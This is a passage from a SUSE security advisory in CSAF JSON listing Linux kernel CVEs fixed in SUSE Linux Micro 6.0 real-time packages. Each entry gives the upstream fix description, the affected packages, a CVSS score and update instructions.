0000000000000000 x6 : 49534d702d535449\n\tx5 : ffffffc080c4c2c0 x4 : ffffffd43ee128c8 x3 : ffffffd43ee124dc\n\tx2 : 0000000000000000 x1 : 0000000000000001 x0 : ffffff806f5693c0\n\tCall trace:\n\t__task_pid_nr_ns+0x74/0xd0\n\t...\n\t__handle_irq_event_percpu+0xd4/0x284\n\thandle_irq_event+0x48/0xb0\n\thandle_fasteoi_irq+0x160/0x2d8\n\tgeneric_handle_domain_irq+0x44/0x60\n\tgic_handle_irq+0x4c/0x114\n\tcall_on_irq_stack+0x3c/0x74\n\tdo_interrupt_handler+0x4c/0x84\n\tel1_interrupt+0x34/0x58\n\tel1h_64_irq_handler+0x18/0x24\n\tel1h_64_irq+0x68/0x6c\n\taccount_kernel_stack+0x60/0x144\n\texit_task_stack_account+0x1c/0x80\n\tdo_exit+0x7e4/0xaf8\n\t...\n\tget_signal+0x7bc/0x8d8\n\tdo_notify_resume+0x128/0x828\n\tel0_svc+0x6c/0x70\n\tel0t_64_sync_handler+0x68/0xbc\n\tel0t_64_sync+0x1a8/0x1ac\n\tCode: 35fffe54 911a02a8 f9400108 b4000128 (b9405a69)\n\t---[ end trace 0000000000000000 ]---\n\tKernel panic - not syncing: Oops: Fatal exception in interrupt",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40178",
"url": "https://www.suse.com/security/cve/CVE-2025-40178"
},
{
"category": "external",
"summary": "SUSE Bug 1253463 for CVE-2025-40178",
"url": "https://bugzilla.suse.com/1253463"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40178"
},
{
"cve": "CVE-2025-40179",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40179"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: verify orphan file size is not too big\n\nIn principle orphan file can be arbitrarily large. However orphan replay\nneeds to traverse it all and we also pin all its buffers in memory. Thus\nfilesystems with absurdly large orphan files can lead to big amounts of\nmemory consumed. Limit orphan file size to a sane value and also use\nkvmalloc() for allocating array of block descriptor structures to avoid\nlarge order allocations for sane but large orphan files.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40179",
"url": "https://www.suse.com/security/cve/CVE-2025-40179"
},
{
"category": "external",
"summary": "SUSE Bug 1253442 for CVE-2025-40179",
"url": "https://bugzilla.suse.com/1253442"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40179"
},
{
"cve": "CVE-2025-40187",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40187"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sctp: fix a null dereference in sctp_disposition sctp_sf_do_5_1D_ce()\n\nIf new_asoc-\u003epeer.adaptation_ind=0 and sctp_ulpevent_make_authkey=0\nand sctp_ulpevent_make_authkey() returns 0, then the variable\nai_ev remains zero and the zero will be dereferenced\nin the sctp_ulpevent_free() function.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40187",
"url": "https://www.suse.com/security/cve/CVE-2025-40187"
},
{
"category": "external",
"summary": "SUSE Bug 1253647 for CVE-2025-40187",
"url": "https://bugzilla.suse.com/1253647"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40187"
},
{
"cve": "CVE-2025-40190",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40190"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: guard against EA inode refcount underflow in xattr update\n\nsyzkaller found a path where ext4_xattr_inode_update_ref() reads an EA\ninode refcount that is already \u003c= 0 and then applies ref_change (often\n-1). That lets the refcount underflow and we proceed with a bogus value,\ntriggering errors like:\n\n EXT4-fs error: EA inode \u003cn\u003e ref underflow: ref_count=-1 ref_change=-1\n EXT4-fs warning: ea_inode dec ref err=-117\n\nMake the invariant explicit: if the current refcount is non-positive,\ntreat this as on-disk corruption, emit ext4_error_inode(), and fail the\noperation with -EFSCORRUPTED instead of updating the refcount. Delete the\nWARN_ONCE() as negative refcounts are now impossible; keep error reporting\nin ext4_error_inode().\n\nThis prevents the underflow and the follow-on orphan/cleanup churn.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40190",
"url": "https://www.suse.com/security/cve/CVE-2025-40190"
},
{
"category": "external",
"summary": "SUSE Bug 1253623 for CVE-2025-40190",
"url": "https://bugzilla.suse.com/1253623"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40190"
},
{
"cve": "CVE-2025-40192",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40192"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"ipmi: fix msg stack when IPMI is disconnected\"\n\nThis reverts commit c608966f3f9c2dca596967501d00753282b395fc.\n\nThis patch has a subtle bug that can cause the IPMI driver to go into an\ninfinite loop if the BMC misbehaves in a certain way. Apparently\ncertain BMCs do misbehave this way because several reports have come in\nrecently about this.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40192",
"url": "https://www.suse.com/security/cve/CVE-2025-40192"
},
{
"category": "external",
"summary": "SUSE Bug 1253622 for CVE-2025-40192",
"url": "https://bugzilla.suse.com/1253622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40192"
},
{
"cve": "CVE-2025-40202",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40202"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipmi: Rework user message limit handling\n\nThe limit on the number of user messages had a number of issues,\nimproper counting in some cases and a use after free.\n\nRestructure how this is all done to handle more in the receive message\nallocation routine, so all refcouting and user message limit counts\nare done in that routine. It\u0027s a lot cleaner and safer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40202",
"url": "https://www.suse.com/security/cve/CVE-2025-40202"
},
{
"category": "external",
"summary": "SUSE Bug 1253451 for CVE-2025-40202",
"url": "https://bugzilla.suse.com/1253451"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40202"
},
{
"cve": "CVE-2025-40211",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40211"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: video: Fix use-after-free in acpi_video_switch_brightness()\n\nThe switch_brightness_work delayed work accesses device-\u003ebrightness\nand device-\u003ebacklight, freed by acpi_video_dev_unregister_backlight()\nduring device removal.\n\nIf the work executes after acpi_video_bus_unregister_backlight()\nfrees these resources, it causes a use-after-free when\nacpi_video_switch_brightness() dereferences device-\u003ebrightness or\ndevice-\u003ebacklight.\n\nFix this by calling cancel_delayed_work_sync() for each device\u0027s\nswitch_brightness_work in acpi_video_bus_remove_notify_handler()\nafter removing the notify handler that queues the work. This ensures\nthe work completes before the memory is freed.\n\n[ rjw: Changelog edit ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40211",
"url": "https://www.suse.com/security/cve/CVE-2025-40211"
},
{
"category": "external",
"summary": "SUSE Bug 1254126 for CVE-2025-40211",
"url": "https://bugzilla.suse.com/1254126"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40211"
},
{
"cve": "CVE-2025-40215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40215"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: delete x-\u003etunnel as we delete x\n\nThe ipcomp fallback tunnels currently get deleted (from the various\nlists and hashtables) as the last user state that needed that fallback\nis destroyed (not deleted). If a reference to that user state still\nexists, the fallback state will remain on the hashtables/lists,\ntriggering the WARN in xfrm_state_fini. Because of those remaining\nreferences, the fix in commit f75a2804da39 (\"xfrm: destroy xfrm_state\nsynchronously on net exit path\") is not complete.\n\nWe recently fixed one such situation in TCP due to defered freeing of\nskbs (commit 9b6412e6979f (\"tcp: drop secpath at the same time as we\ncurrently drop dst\")). This can also happen due to IP reassembly: skbs\nwith a secpath remain on the reassembly queue until netns\ndestruction. If we can\u0027t guarantee that the queues are flushed by the\ntime xfrm_state_fini runs, there may still be references to a (user)\nxfrm_state, preventing the timely deletion of the corresponding\nfallback state.\n\nInstead of chasing each instance of skbs holding a secpath one by one,\nthis patch fixes the issue directly within xfrm, by deleting the\nfallback state as soon as the last user state depending on it has been\ndeleted. Destruction will still happen when the final reference is\ndropped.\n\nA separate lockdep class for the fallback state is required since\nwe\u0027re going to lock x-\u003etunnel while x is locked.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40215",
"url": "https://www.suse.com/security/cve/CVE-2025-40215"
},
{
"category": "external",
"summary": "SUSE Bug 1254959 for CVE-2025-40215",
"url": "https://bugzilla.suse.com/1254959"
},
{
"category": "external",
"summary": "SUSE Bug 1255054 for CVE-2025-40215",
"url": "https://bugzilla.suse.com/1255054"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-40215"
},
{
"cve": "CVE-2025-40219",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40219"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV\n\nBefore disabling SR-IOV via config space accesses to the parent PF,\nsriov_disable() first removes the PCI devices representing the VFs.\n\nSince commit 9d16947b7583 (\"PCI: Add global pci_lock_rescan_remove()\")\nsuch removal operations are serialized against concurrent remove and\nrescan using the pci_rescan_remove_lock. No such locking was ever added\nin sriov_disable() however. In particular when commit 18f9e9d150fc\n(\"PCI/IOV: Factor out sriov_add_vfs()\") factored out the PCI device\nremoval into sriov_del_vfs() there was still no locking around the\npci_iov_remove_virtfn() calls.\n\nOn s390 the lack of serialization in sriov_disable() may cause double\nremove and list corruption with the below (amended) trace being observed:\n\n PSW: 0704c00180000000 0000000c914e4b38 (klist_put+56)\n GPRS: 000003800313fb48 0000000000000000 0000000100000001 0000000000000001\n\t00000000f9b520a8 0000000000000000 0000000000002fbd 00000000f4cc9480\n\t0000000000000001 0000000000000000 0000000000000000 0000000180692828\n\t00000000818e8000 000003800313fe2c 000003800313fb20 000003800313fad8\n #0 [3800313fb20] device_del at c9158ad5c\n #1 [3800313fb88] pci_remove_bus_device at c915105ba\n #2 [3800313fbd0] pci_iov_remove_virtfn at c9152f198\n #3 [3800313fc28] zpci_iov_remove_virtfn at c90fb67c0\n #4 [3800313fc60] zpci_bus_remove_device at c90fb6104\n #5 [3800313fca0] __zpci_event_availability at c90fb3dca\n #6 [3800313fd08] chsc_process_sei_nt0 at c918fe4a2\n #7 [3800313fd60] crw_collect_info at c91905822\n #8 [3800313fe10] kthread at c90feb390\n #9 [3800313fe68] __ret_from_fork at c90f6aa64\n #10 [3800313fe98] ret_from_fork at c9194f3f2.\n\nThis is because in addition to sriov_disable() removing the VFs, the\nplatform also generates hot-unplug events for the VFs. This being the\nreverse operation to the hotplug events generated by sriov_enable() and\nhandled via pdev-\u003eno_vf_scan. And while the event processing takes\npci_rescan_remove_lock and checks whether the struct pci_dev still exists,\nthe lack of synchronization makes this checking racy.\n\nOther races may also be possible of course though given that this lack of\nlocking persisted so long observable races seem very rare. Even on s390 the\nlist corruption was only observed with certain devices since the platform\nevents are only triggered by config accesses after the removal, so as long\nas the removal finished synchronously they would not race. Either way the\nlocking is missing so fix this by adding it to the sriov_del_vfs() helper.\n\nJust like PCI rescan-remove, locking is also missing in sriov_add_vfs()\nincluding for the error case where pci_stop_and_remove_bus_device() is\ncalled without the PCI rescan-remove lock being held. Even in the non-error\ncase, adding new PCI devices and buses should be serialized via the PCI\nrescan-remove lock. Add the necessary locking.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40219",
"url": "https://www.suse.com/security/cve/CVE-2025-40219"
},
{
"category": "external",
"summary": "SUSE Bug 1254518 for CVE-2025-40219",
"url": "https://bugzilla.suse.com/1254518"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40219"
},
{
"cve": "CVE-2025-40220",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40220"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix livelock in synchronous file put from fuseblk workers\n\nI observed a hang when running generic/323 against a fuseblk server.\nThis test opens a file, initiates a lot of AIO writes to that file\ndescriptor, and closes the file descriptor before the writes complete.\nUnsurprisingly, the AIO exerciser threads are mostly stuck waiting for\nresponses from the fuseblk server:\n\n# cat /proc/372265/task/372313/stack\n[\u003c0\u003e] request_wait_answer+0x1fe/0x2a0 [fuse]\n[\u003c0\u003e] __fuse_simple_request+0xd3/0x2b0 [fuse]\n[\u003c0\u003e] fuse_do_getattr+0xfc/0x1f0 [fuse]\n[\u003c0\u003e] fuse_file_read_iter+0xbe/0x1c0 [fuse]\n[\u003c0\u003e] aio_read+0x130/0x1e0\n[\u003c0\u003e] io_submit_one+0x542/0x860\n[\u003c0\u003e] __x64_sys_io_submit+0x98/0x1a0\n[\u003c0\u003e] do_syscall_64+0x37/0xf0\n[\u003c0\u003e] entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nBut the /weird/ part is that the fuseblk server threads are waiting for\nresponses from itself:\n\n# cat /proc/372210/task/372232/stack\n[\u003c0\u003e] request_wait_answer+0x1fe/0x2a0 [fuse]\n[\u003c0\u003e] __fuse_simple_request+0xd3/0x2b0 [fuse]\n[\u003c0\u003e] fuse_file_put+0x9a/0xd0 [fuse]\n[\u003c0\u003e] fuse_release+0x36/0x50 [fuse]\n[\u003c0\u003e] __fput+0xec/0x2b0\n[\u003c0\u003e] task_work_run+0x55/0x90\n[\u003c0\u003e] syscall_exit_to_user_mode+0xe9/0x100\n[\u003c0\u003e] do_syscall_64+0x43/0xf0\n[\u003c0\u003e] entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nThe fuseblk server is fuse2fs so there\u0027s nothing all that exciting in\nthe server itself. So why is the fuse server calling fuse_file_put?\nThe commit message for the fstest sheds some light on that:\n\n\"By closing the file descriptor before calling io_destroy, you pretty\nmuch guarantee that the last put on the ioctx will be done in interrupt\ncontext (during I/O completion).\n\nAha. AIO fgets a new struct file from the fd when it queues the ioctx.\nThe completion of the FUSE_WRITE command from userspace causes the fuse\nserver to call the AIO completion function. The completion puts the\nstruct file, queuing a delayed fput to the fuse server task. When the\nfuse server task returns to userspace, it has to run the delayed fput,\nwhich in the case of a fuseblk server, it does synchronously.\n\nSending the FUSE_RELEASE command sychronously from fuse server threads\nis a bad idea because a client program can initiate enough simultaneous\nAIOs such that all the fuse server threads end up in delayed_fput, and\nnow there aren\u0027t any threads left to handle the queued fuse commands.\n\nFix this by only using asynchronous fputs when closing files, and leave\na comment explaining why.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40220",
"url": "https://www.suse.com/security/cve/CVE-2025-40220"
},
{
"category": "external",
"summary": "SUSE Bug 1254520 for CVE-2025-40220",
"url": "https://bugzilla.suse.com/1254520"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
